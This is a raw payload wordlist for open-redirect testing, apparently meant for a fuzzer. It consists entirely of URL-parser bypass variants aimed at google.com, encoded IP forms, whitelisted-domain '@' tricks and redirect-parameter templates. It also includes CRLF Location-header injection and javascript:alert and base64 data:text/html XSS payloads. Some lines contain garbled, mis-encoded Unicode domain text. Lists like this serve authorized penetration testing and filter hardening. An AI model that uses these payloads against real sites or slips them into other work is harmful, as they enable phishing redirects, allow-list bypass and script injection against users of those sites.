http%3A%2F%2Fchelanpud.org
////google.com
//google%E3%80%82com
";alert(0);//
////216.58.214.206
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f..
////google.com/%2f%2e%2e
///216.58.214.206
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f..
///google.com/%2f%2e%2e
//216.58.214.206
//google.com
//google.com//%2F%2E%2E
//google.com/%2e%2e
//google.com/%2E%2E
//google.com/%2e%2e%2f
//google.com/%2f..
//google.com/%2f%2e%2e
//google%00.com
/\/google.com
/\/google.com/
/\216.58.214.206
/216.58.214.206
/google.com/%2e%2e
/google.com/%2f%2e%2e
\/\/google.com/
216.58.214.206
google.com
http:[::216.58.214.206]
http:[::ffff:216.58.214.206]
http://[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://00330.00072.0000326.00000316
http://00330.0x3a.54990
http://00330.3856078
http://0330.072.0326.0316
http://0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http://0xd83ad6ce
http:%0a%0dgoogle.com
http:%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:00330.00072.0000326.00000316
http:00330.0x3a.54990
http:00330.3856078
http:0330.072.0326.0316
http:0xd8.072.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd8.3856078
http:0xd83ad6ce
https:google.com
java%0d%0ascript%0d%0a:alert(0)
?checkout_url={payload}
?continue={payload}
?dest={payload}
?destination={payload}
?go={payload}
?image_url={payload}
?next={payload}
?next=www.test.com&next=google.com
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
?return_path={payload}
?return_to={payload}
?return={payload}
?returnTo={payload}
?rurl={payload}
?target={payload}
?url={payload}
?view={payload}
../google.com
.google.com
.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
@google.com
@https://www.google.com
@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/?redir=googleã€‚com
/.google.com
/.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/{payload}
//;@google.com
//;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///;@google.com
/////google.com
/////google.com/
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////\;@google.com
////%09/google.com
////%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/whitelisted.com@google.com
////%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cgoogle.com
////%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cwhitelisted.com@google.com
////%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////3627734734
////google.com/
////google.com//
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////whitelisted.com@google.com/
////whitelisted.com@google.com//
////whitelisted.com@google.com/%2e%2e
////whitelisted.com@google.com/%2e%2e%2f
////whitelisted.com@google.com/%2f..
////whitelisted.com@google.com/%2f%2e%2e
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///\;@google.com
///\;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/google.com
///%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/whitelisted.com@google.com
///%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cgoogle.com
///%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cwhitelisted.com@google.com
///%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///3627734734
///google.com
///google.com/
///google.com//
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///whitelisted.com@google.com/
///whitelisted.com@google.com//
///whitelisted.com@google.com/%2e%2e
///whitelisted.com@google.com/%2e%2e%2f
///whitelisted.com@google.com/%2f..
///whitelisted.com@google.com/%2f%2e%2e
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//\/google.com/
//\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//\google.com
//%09/google.com
//%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/whitelisted.com@google.com
//%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fgoogle.com
//%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5cgoogle.com
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5cwhitelisted.com@google.com
//%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//3627734734
//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//google.com:80?@whitelisted.com/
//google.com:80#@whitelisted.com/
//google.com/
//google.com//
//google.com/%2F..
//google.com/%2F.. 
//google.com/whitelisted.com
//google.com\@whitelisted.com
//google.com\twhitelisted.com/
//googleã€‚com
//https:///google.com/%2e%2e
//https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://google.com//
//https://google.com/%2e%2e%2f
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://whitelisted.com@google.com//
//https://whitelisted.com@google.com/%2e%2e%2f
//https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//javascript:alert(1)
//javascript:alert(1);
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@whitelisted.com/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@whitelisted.com/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@whitelisted.com
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twhitelisted.com/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
//whitelisted.com@google.com/
//whitelisted.com@google.com//
//whitelisted.com@google.com/%2e%2e%2f
//whitelisted.com@google.com/%2f..
//whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com@https:///google.com/%2e%2e
//whitelisted.com@https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//whitelisted.com+&@google.com#+@whitelisted.com/
//whitelisted.com+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@whitelisted.com/
//www.google.com
//XY>.7d8T\205pZM@whitelisted.com@google.com/
//XY>.7d8T\205pZM@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@whitelisted.com+@google.com/
//XY>.7d8T\205pZM@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/\/\/google.com/
/\/\google.com
/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/\3627734734
/\google.com
/\google%252ecom
/\whitelisted.com:80%40google.com
/%09/google.com
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/whitelisted.com@google.com
/%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2fgoogle.com
/%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
/%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5cwhitelisted.com@google.com
/%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/<>//google.com
/ã€±google.com
/ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/3627734734
/cgi-bin/redirect.cgi?{payload}
/google.com
/google.com/%2F..
/google.com/%2F.. 
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://google.com
/http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/google.com
/http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:///google.com/%2f%2e%2e
/https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///whitelisted.com@google.com/%2f%2e%2e
/https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://%09/google.com
/https://%5cgoogle.com
/https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5cwhitelisted.com@google.com
/https://%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://google.com
/https://google.com/
/https://google.com//
/https://google.com/%2e%2e
/https://google.com/%2f..
/https://google.com/%2f%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://whitelisted.com@google.com/
/https://whitelisted.com@google.com/%2e%2e
/https://whitelisted.com@google.com/%2f..
/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f..
/https://whitelisted.com@google.com/%2f%2e%2e
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:/%5cgoogle.com/
/https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https:google.com
/javascript:alert(1)
/javascript:alert(1);
/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/login?to={payload}
/out?{payload}
/out/{payload}
/redirect/{payload}
/x:1/:///%01javascript:alert(document.cookie)/
\/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
\152\141\166\141\163\143\162\151\160\164\072alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x20http://google.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
&%0d%0a1Location:https://google.com
%01https://google.com
%01https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
%2f$2f216.58.214.206
%2f$2f3627734734
%2f$2fgoogle.com
%2f216.58.214.206
%2f216.58.214.206//
%2f216.58.214.206%2f%2f
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
%2fgoogle.com
%2fgoogle.com//
%2fgoogle.com%2f%2f
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
<>//google.com
<>//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
<>javascript:alert(1);
ã€±google.com
ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
$2f%2f216.58.214.206%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
172.217.167.46
3627734734
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
google.com/.jpg
google.com/whitelisted.com
google.com%23@whitelisted.com
google%252ecom
hthttp://tp://google.com
http://;@google.com
http://;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://.google.com
http://.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://3627734734
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/
http://3H6k7lIAiqjfNeN@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
http://3H6k7lIAiqjfNeN@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://472.314.470.462
http://a.comï¼X.b.com
http://google.com
hTTp://google.com
HtTP://google.com
HTTP://google.com
http://google.com:80?@whitelisted.com/
http://google.com:80#@whitelisted.com/
http://google.com\twhitelisted.com/
http://google.com%23.whitelisted.com/
http://google.com%2f%2f.whitelisted.com/
http://google.com%3F.whitelisted.com/
http://google.com%5c%5c.whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twhitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.whitelisted.com/
http://whitelisted.com:80%40google.com/
http://whitelisted.com:80%40â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://whitelisted.com@[::216.58.214.206]
http://whitelisted.com@[::ffff:216.58.214.206]
http://whitelisted.com@00330.00072.0000326.00000316
http://whitelisted.com@00330.0x3a.54990
http://whitelisted.com@00330.3856078
http://whitelisted.com@0330.072.0326.0316
http://whitelisted.com@0xd8.072.54990
http://whitelisted.com@0xd8.0x3a.0xd6.0xce
http://whitelisted.com@0xd8.3856078
http://whitelisted.com@0xd83ad6ce
http://whitelisted.com@3627734734
http://whitelisted.com@472.314.470.462
http://whitelisted.com@google.com/
http://whitelisted.com%2egoogle.com/
http://whitelisted.com%2eâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://whitelisted.com+&@google.com#+@whitelisted.com/
http://whitelisted.com+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@whitelisted.com/
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
http://www.example.com/redirect.php?url=javascript:prompt(1)
http://www.google.com
http://www.google.com\.whitelisted.com
http://www.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.whitelisted.com
http://www.theirsite.com@yoursite.com/
http://www.yoursite.com?folder/www.folder.com
http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
http://www.yoursite.com/http://www.theirsite.com/
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@whitelisted.com@google.com/
http://XY>.7d8T\205pZM@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@whitelisted.com+@google.com/
http://XY>.7d8T\205pZM@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http:/\/\google.com
http:/google.com
http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:3627734734
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@472.314.470.462
http:472.314.470.462
http:google.com
http:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:whitelisted.com@[::216.58.214.206]
http:whitelisted.com@[::ffff:216.58.214.206]
http:whitelisted.com@00330.00072.0000326.00000316
http:whitelisted.com@00330.0x3a.54990
http:whitelisted.com@00330.3856078
http:whitelisted.com@0330.072.0326.0316
http:whitelisted.com@0xd8.072.54990
http:whitelisted.com@0xd8.0x3a.0xd6.0xce
http:whitelisted.com@0xd8.3856078
http:whitelisted.com@0xd83ad6ce
http:whitelisted.com@3627734734
http:whitelisted.com@472.314.470.462
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@472.314.470.462
http\x3A\x2F\x2Fgoogle.com
http%3A%2F%2Fwww.google.com
https://:@google.com\@whitelisted.com
https://:@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@whitelisted.com
https://////google.com
https:///google.com/%2e%2e
https:///google.com/%2f%2e%2e
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
